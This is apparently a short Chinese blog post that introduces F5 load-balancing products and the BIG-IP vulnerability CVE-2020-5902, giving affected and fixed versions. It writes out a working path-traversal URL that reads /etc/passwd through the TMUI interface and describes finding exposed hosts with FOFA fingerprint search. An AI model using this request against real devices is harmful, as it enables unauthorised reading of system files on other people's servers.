认识F5
F5是一家国外安全厂商,国内比较有名的产品是负载均衡,产品名字也叫F5,各大银行及互联网金融行业可能用到了该厂商这款产品;产品主要是用来做链路负责和应用负载;相比国内的启明、绿盟的负载设备,F5负载设备个人认为是比较好用的,当然价格也不便宜,先来看一下设备登录页,至于里面的功能这里不做介绍。
了解完F5产品左右,我们来关注最新爆出来的安全漏洞
近期爆RCE漏洞是什么
------cve-2020-5902 BIG-IP RCE漏洞
简介
BIG-IP的TMUI存在RCE漏洞
影响范围
版本号主要如下
11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x
修复方法
升级
11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4
文件读取
https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
利用fofa搜索F5指纹信息,以搜出来IP:8443为列,读取系统passwd文件如下
参考链接: